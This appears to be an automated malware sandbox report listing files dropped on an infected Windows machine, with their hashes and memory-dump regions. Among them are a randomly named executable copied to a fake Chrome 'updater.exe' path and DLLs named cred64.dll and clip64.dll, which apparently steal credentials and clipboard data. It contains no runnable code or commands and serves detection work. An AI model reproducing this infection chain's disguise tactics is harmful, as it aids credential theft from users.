C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp

MD5 ebec033f87337532b23d9398f649eec9
SHA1 c4335168ec2f70621f11f614fe24ccd16d15c9fb
SHA256 82fdd2282cf61cfa6155c51a82c4db79487ffeb377d0245d513edeb44d731c16
SHA512 3875c2dd9bbeb5be00c2ccf8391bcb92d328a3294ce5c2d31fd09f20d80e12bd610d5473dfc2e13962578e4bb75336615cdf16251489a31ecbe4873d09cf1b11

C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe

MD5 4dcf3c5bf7efb2112eb1249a6c0a28bd
SHA1 f93aaf9f98154e0c23c2f0df806d46dd223f1a39
SHA256 86b86bf20ed0d0a79e459e9a040e0f398b0c6e186b3d4dfff5471f7c3bee002d
SHA512 3719722ccc3d0eb9eefc116bc8f719c2ce0c963fa735679049b984e2c4018f838f3aa340db9f1d9bea90c76beeb5292a192a7b2f99308af60de3fd4049b13024

memory/3080-220-0x0000000000400000-0x00000000004D8000-memory.dmp

\Users\Admin\AppData\Local\Temp\Opera_installer_2310050449580465008.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/4896-223-0x0000000000400000-0x000000000046A000-memory.dmp

memory/4200-226-0x00007FF76EC10000-0x00007FF76F153000-memory.dmp

memory/4940-232-0x0000000000400000-0x0000000000513000-memory.dmp

C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe

MD5 4dcf3c5bf7efb2112eb1249a6c0a28bd
SHA1 f93aaf9f98154e0c23c2f0df806d46dd223f1a39
SHA256 86b86bf20ed0d0a79e459e9a040e0f398b0c6e186b3d4dfff5471f7c3bee002d
SHA512 3719722ccc3d0eb9eefc116bc8f719c2ce0c963fa735679049b984e2c4018f838f3aa340db9f1d9bea90c76beeb5292a192a7b2f99308af60de3fd4049b13024

memory/3828-233-0x0000000000400000-0x000000000071C000-memory.dmp

memory/2248-234-0x0000000000B60000-0x00000000010AD000-memory.dmp

\Users\Admin\AppData\Local\Temp\Opera_installer_2310050449595304468.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/5008-246-0x0000000000B60000-0x00000000010AD000-memory.dmp

memory/4468-248-0x0000000000B60000-0x00000000010AD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\713497151363

MD5 7715b6d8955da4bf4f7f3615ebcd5d16
SHA1 6cd420c7a0e96e96341b43d99dd623299a8bbc1f
SHA256 5275ccd3e5ee7faa9dd10363900a86dc5039a40de9fcfb5790d2d2f9f8e2700a
SHA512 25884d4311cb11cb82a2650695f92d7d2757c3bf31824c30ac457cf8cecd2fb3648cb5de80c1305678dc7cddf627fd88bacc0bd2f0fbb648b85b80f858ac610d

memory/1200-213-0x0000000000DB0000-0x00000000012FD000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 1bfe591a4fe3d91b03cdf26eaacd8f89
SHA1 719c37c320f518ac168c86723724891950911cea
SHA256 9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8
SHA512 02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 1bfe591a4fe3d91b03cdf26eaacd8f89
SHA1 719c37c320f518ac168c86723724891950911cea
SHA256 9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8
SHA512 02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 1ce65bbc83e7d7317440bfe0834cbef2
SHA1 f4804773cf223032389ab1e8666403d4ec4986e4
SHA256 f2ce0b72fc9a7c84d53d88279d483225fbf9801bec8dcfbabfc1aec25bf5c743
SHA512 7754c0af0335d0446c8e5a5bce0a28713d47ae356ec4de4a855cdd3cfd1b6fbe4bda69e6eae60b51b10d835cac75f56b2c9bd6cf0ab154208f4a9f683ddce447

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 1bfe591a4fe3d91b03cdf26eaacd8f89
SHA1 719c37c320f518ac168c86723724891950911cea
SHA256 9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8
SHA512 02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 1ce65bbc83e7d7317440bfe0834cbef2
SHA1 f4804773cf223032389ab1e8666403d4ec4986e4
SHA256 f2ce0b72fc9a7c84d53d88279d483225fbf9801bec8dcfbabfc1aec25bf5c743
SHA512 7754c0af0335d0446c8e5a5bce0a28713d47ae356ec4de4a855cdd3cfd1b6fbe4bda69e6eae60b51b10d835cac75f56b2c9bd6cf0ab154208f4a9f683ddce447

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 1bfe591a4fe3d91b03cdf26eaacd8f89
SHA1 719c37c320f518ac168c86723724891950911cea
SHA256 9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8
SHA512 02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 1ce65bbc83e7d7317440bfe0834cbef2
SHA1 f4804773cf223032389ab1e8666403d4ec4986e4
SHA256 f2ce0b72fc9a7c84d53d88279d483225fbf9801bec8dcfbabfc1aec25bf5c743
SHA512 7754c0af0335d0446c8e5a5bce0a28713d47ae356ec4de4a855cdd3cfd1b6fbe4bda69e6eae60b51b10d835cac75f56b2c9bd6cf0ab154208f4a9f683ddce447

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 60fe01df86be2e5331b0cdbe86165686
SHA1 2a79f9713c3f192862ff80508062e64e8e0b29bd
SHA256 c08ccbc876cd5a7cdfa9670f9637da57f6a1282198a9bc71fc7d7247a6e5b7a8
SHA512 ef9f9a4dedcbfe339f4f3d07fb614645596c6f2b15608bdccdad492578b735f7cb075bdaa07178c764582ee345857ec4665f90342694e6a60786bb3d9b3a3d23

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 05653ef855c4f21ee677d832bd53b90f
SHA1 3642996fe690e7392f1df653dd3150a6d6c62b0f
SHA256 bdabfcd7b2658b6105280858371477b44e84f54ba304c1dbdd602595e8344c7d
SHA512 46594a3306f5abd676f29ef13ba29ac3f7717da5796ae40b7d1ff8bb9770bcdbd3a09f4f1176821fb780b27ae1297d859261f587acbff095584835a6025c1ead

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 ed8131e04edd227d44cbdcf49481ddd5
SHA1 ecca97110a19e45f02969954a083eef340162563
SHA256 7752a3bbc8005b0a0e1dc961667a8599041a33ca7a666eedb34b91c4d8c16185
SHA512 56e160af63b4eca9a9bbea7f05e2d3893ad37e9126892eb1f993935cec8d9fa2a5f7a6632bba0973ebf9d7fac8cb9c05cd1ea56b55fb01ce73a5463f3137d32a

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 ed8131e04edd227d44cbdcf49481ddd5
SHA1 ecca97110a19e45f02969954a083eef340162563
SHA256 7752a3bbc8005b0a0e1dc961667a8599041a33ca7a666eedb34b91c4d8c16185
SHA512 56e160af63b4eca9a9bbea7f05e2d3893ad37e9126892eb1f993935cec8d9fa2a5f7a6632bba0973ebf9d7fac8cb9c05cd1ea56b55fb01ce73a5463f3137d32a

memory/4628-302-0x0000000006810000-0x0000000006D3C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

C:\Users\Admin\AppData\Local\Temp\is-OKMTS.tmp\8758677____.exe

MD5 65e5ccda7c002e24eb090ad1c9602b0f
SHA1 2daf02ebb81660eb07cff159d9bdfd7f544c2c13
SHA256 a29e50e997346fe1b47d0c93aafc4d9e08642c199d8ec1ef79f6d09e1618c439
SHA512 c46f1eb108b79011f63ca7907e8536e78034d1be26510b9cf0ffd4b69d46adcd084467bfb1419e7e069cda27d5e61b65092d58bec7c44c4939058ab75482525e

C:\Users\Admin\AppData\Local\Temp\is-OKMTS.tmp\8758677____.exe

MD5 65e5ccda7c002e24eb090ad1c9602b0f
SHA1 2daf02ebb81660eb07cff159d9bdfd7f544c2c13
SHA256 a29e50e997346fe1b47d0c93aafc4d9e08642c199d8ec1ef79f6d09e1618c439
SHA512 c46f1eb108b79011f63ca7907e8536e78034d1be26510b9cf0ffd4b69d46adcd084467bfb1419e7e069cda27d5e61b65092d58bec7c44c4939058ab75482525e

memory/4628-311-0x0000000073300000-0x00000000739EE000-memory.dmp

memory/4628-312-0x0000000007360000-0x000000000736A000-memory.dmp

memory/1032-314-0x000001A6CF850000-0x000001A6CF8D4000-memory.dmp

memory/2552-316-0x00007FFCF6400000-0x00007FFCF6DEC000-memory.dmp

memory/2552-317-0x000001597E470000-0x000001597E480000-memory.dmp

memory/2552-318-0x000001597E470000-0x000001597E480000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f91c15760042c6a1967ef15545b9d516
SHA1 5b4cff3959b1d45f522dc7b797524a1842c952cd
SHA256 03abfc18be7e1857550c9a0b45e044b42aa64e116508bc74f5426d2b07b4d812
SHA512 39744cfe0f7b7e760e505383ff30500203e9c47b1b71a2e707a52682f5da5d6c1c11f6977f9b630c9bb177aab319c4962f211865b807d1f8e8d21100acf09155

memory/1032-320-0x00007FFCF6400000-0x00007FFCF6DEC000-memory.dmp

memory/3828-322-0x00000000008B0000-0x00000000008B1000-memory.dmp

memory/4104-326-0x0000000002DE0000-0x0000000002F51000-memory.dmp

memory/4104-327-0x0000000002F60000-0x0000000003091000-memory.dmp

memory/1032-331-0x000001A6CFC70000-0x000001A6CFCD2000-memory.dmp

memory/4200-330-0x00007FF76EC10000-0x00007FF76F153000-memory.dmp

memory/4940-332-0x0000000000400000-0x0000000000513000-memory.dmp

memory/3828-333-0x0000000000400000-0x000000000071C000-memory.dmp

memory/2552-372-0x000001597E470000-0x000001597E480000-memory.dmp

memory/1032-371-0x000001A6E9E70000-0x000001A6E9E80000-memory.dmp

memory/1032-373-0x000001A6E9D10000-0x000001A6E9D6E000-memory.dmp

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

MD5 3945df42a2cbe47502705ecde2ff2a87
SHA1 1545a5a72ffaf6c6c8e9df0ca6aa8d2aff5cc5b5
SHA256 c767ecc88396047716862b881480450b517715bfc7bdd12c878cf2d54262f1f8
SHA512 0850ac896ae1d8e766d34746294d212fe071c45e0f740085d37236e0caa05d823ad4ddfeba2baf1bcc71b20612058f08dbafd62fb3deb1a8ed1074d2eae71ead

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

MD5 3945df42a2cbe47502705ecde2ff2a87
SHA1 1545a5a72ffaf6c6c8e9df0ca6aa8d2aff5cc5b5
SHA256 c767ecc88396047716862b881480450b517715bfc7bdd12c878cf2d54262f1f8
SHA512 0850ac896ae1d8e766d34746294d212fe071c45e0f740085d37236e0caa05d823ad4ddfeba2baf1bcc71b20612058f08dbafd62fb3deb1a8ed1074d2eae71ead

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

MD5 3945df42a2cbe47502705ecde2ff2a87
SHA1 1545a5a72ffaf6c6c8e9df0ca6aa8d2aff5cc5b5
SHA256 c767ecc88396047716862b881480450b517715bfc7bdd12c878cf2d54262f1f8
SHA512 0850ac896ae1d8e766d34746294d212fe071c45e0f740085d37236e0caa05d823ad4ddfeba2baf1bcc71b20612058f08dbafd62fb3deb1a8ed1074d2eae71ead

memory/4628-382-0x00000000053F0000-0x0000000005400000-memory.dmp

memory/2552-381-0x000001597E470000-0x000001597E480000-memory.dmp

memory/2552-386-0x00007FFCF6400000-0x00007FFCF6DEC000-memory.dmp

memory/4200-391-0x00007FF76EC10000-0x00007FF76F153000-memory.dmp

memory/3828-393-0x0000000000400000-0x000000000071C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

memory/3828-406-0x0000000000400000-0x000000000071C000-memory.dmp

memory/3080-407-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

memory/4200-410-0x00007FF76EC10000-0x00007FF76F153000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\50-12455-789-680a2-6b7bd6c441069\Wucihaewypi.exe

MD5 12b9ea8a702a9737e186f8057c5b4a3a
SHA1 4184e9decf6bbc584a822098249e905644c4def2
SHA256 0ede12df938accd1be25420696db2969815ca0a2cd22d0c68a3352faa88f1001
SHA512 f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713

C:\Users\Admin\AppData\Local\Temp\50-12455-789-680a2-6b7bd6c441069\Wucihaewypi.exe

MD5 12b9ea8a702a9737e186f8057c5b4a3a
SHA1 4184e9decf6bbc584a822098249e905644c4def2
SHA256 0ede12df938accd1be25420696db2969815ca0a2cd22d0c68a3352faa88f1001
SHA512 f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713

C:\Users\Admin\AppData\Local\Temp\50-12455-789-680a2-6b7bd6c441069\Wucihaewypi.exe.config

MD5 98d2687aec923f98c37f7cda8de0eb19
SHA1 f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7
SHA256 8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465
SHA512 95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

memory/4928-428-0x000000006B540000-0x000000006BAF0000-memory.dmp

memory/4928-429-0x00000000033B0000-0x00000000033C0000-memory.dmp

memory/1032-432-0x00007FFCF6400000-0x00007FFCF6DEC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050449571\opera_package

MD5 1b4af0087d5df808f26f57534a532aa9
SHA1 d32d1fcecbef0e361d41943477a1df25114ce7af
SHA256 22c21ff3d0f5af1c2191318ea12921cfd5434afc32c0641d58fd3f3a218ea111
SHA512 e5a32022fd08464a24c89819703fd9f05c75bd5b47392aae186b96a8e1146fb0c98cda14bfec9a1393c0cdde706db77d32e7a9a86e4611c72103265982d31e07

memory/1032-451-0x000001A6E9E70000-0x000001A6E9E80000-memory.dmp

memory/4104-450-0x0000000002F60000-0x0000000003091000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050449571\additional_file0.tmp

MD5 79ef7e63ffe3005c8edacaa49e997bdc
SHA1 9a236cb584c86c0d047ce55cdda4576dd40b027e
SHA256 388a4c959063e7edf133058e2cf797574bed808776a7c9a0307aaeb718ff7bd1
SHA512 59ee17f0f452617bcd1a4e42947310c52c21e88d31f1d6a09ebdb6ab400fcb1f997627a0f97fa185e58683d65a45425f8a7ec698f63a84d91c838e0f7e899094

memory/5104-475-0x00007FF771730000-0x00007FF771C73000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050449571\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

MD5 79ef7e63ffe3005c8edacaa49e997bdc
SHA1 9a236cb584c86c0d047ce55cdda4576dd40b027e
SHA256 388a4c959063e7edf133058e2cf797574bed808776a7c9a0307aaeb718ff7bd1
SHA512 59ee17f0f452617bcd1a4e42947310c52c21e88d31f1d6a09ebdb6ab400fcb1f997627a0f97fa185e58683d65a45425f8a7ec698f63a84d91c838e0f7e899094

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050449571\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

MD5 79ef7e63ffe3005c8edacaa49e997bdc
SHA1 9a236cb584c86c0d047ce55cdda4576dd40b027e
SHA256 388a4c959063e7edf133058e2cf797574bed808776a7c9a0307aaeb718ff7bd1
SHA512 59ee17f0f452617bcd1a4e42947310c52c21e88d31f1d6a09ebdb6ab400fcb1f997627a0f97fa185e58683d65a45425f8a7ec698f63a84d91c838e0f7e899094

C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll

MD5 4bd56443d35c388dbeabd8357c73c67d
SHA1 26248ce8165b788e2964b89d54d1f1125facf8f9
SHA256 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867
SHA512 100dc81a0d74725d74ed3801d7828c53c36315179427e88404cb482f83afc0e8766fd86642b4396b37dd7e3262d66d7138c8b4a175354af98254869fbdd43192

C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll

MD5 4bd56443d35c388dbeabd8357c73c67d
SHA1 26248ce8165b788e2964b89d54d1f1125facf8f9
SHA256 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867
SHA512 100dc81a0d74725d74ed3801d7828c53c36315179427e88404cb482f83afc0e8766fd86642b4396b37dd7e3262d66d7138c8b4a175354af98254869fbdd43192

\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll

MD5 4bd56443d35c388dbeabd8357c73c67d
SHA1 26248ce8165b788e2964b89d54d1f1125facf8f9
SHA256 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867
SHA512 100dc81a0d74725d74ed3801d7828c53c36315179427e88404cb482f83afc0e8766fd86642b4396b37dd7e3262d66d7138c8b4a175354af98254869fbdd43192

C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll

MD5 49b3faf5b84f179885b1520ffa3ef3da
SHA1 c1ac12aeca413ec45a4f09aa66f0721b4f80413e
SHA256 b89189d3fca0a41aee9d4582a8efbe820d49e87224c325b4a0f4806d96bf86a5
SHA512 018d531b3328267ecaebcb9f523c386c8aa36bf29e7b2e0f61bd96a0f7f2d03c7f25f878c373fbce7e44c8d5512e969b816ed9c72edb44afa302670c652de742

memory/4928-496-0x000000006B540000-0x000000006BAF0000-memory.dmp

memory/4928-501-0x00000000033B0000-0x00000000033C0000-memory.dmp

memory/2552-529-0x00007FFCF6400000-0x00007FFCF6DEC000-memory.dmp

memory/2552-530-0x000001D406460000-0x000001D406470000-memory.dmp

memory/2552-550-0x000001D41EBB0000-0x000001D41EBCC000-memory.dmp

memory/5104-549-0x00007FF771730000-0x00007FF771C73000-memory.dmp

memory/2552-557-0x000001D41F0C0000-0x000001D41F179000-memory.dmp

memory/2552-558-0x00007FF7BD670000-0x00007FF7BD680000-memory.dmp

memory/2552-591-0x000001D41EBD0000-0x000001D41EBDA000-memory.dmp

memory/2552-653-0x000001D406460000-0x000001D406470000-memory.dmp

memory/2552-654-0x000001D406460000-0x000001D406470000-memory.dmp

memory/428-694-0x0000000000400000-0x0000000000D62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-HIHUH.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3